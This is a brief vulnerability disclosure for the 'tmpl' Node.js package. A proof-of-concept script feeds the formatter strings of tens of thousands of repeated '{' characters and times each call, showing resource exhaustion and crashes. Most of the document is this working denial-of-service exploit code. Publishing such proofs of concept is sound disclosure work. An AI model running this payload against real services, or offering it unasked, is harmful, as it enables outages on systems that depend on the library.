It allows cause a denial of service when formatting crafted string.
// PoC.js
var tmpl = require("tmpl")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = ""+"{".repeat(i*10000)+"answer";
tmpl(attack_str, { answer: 42 })
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
This vulnerability is capable of exhausting system resources and leads to crashes.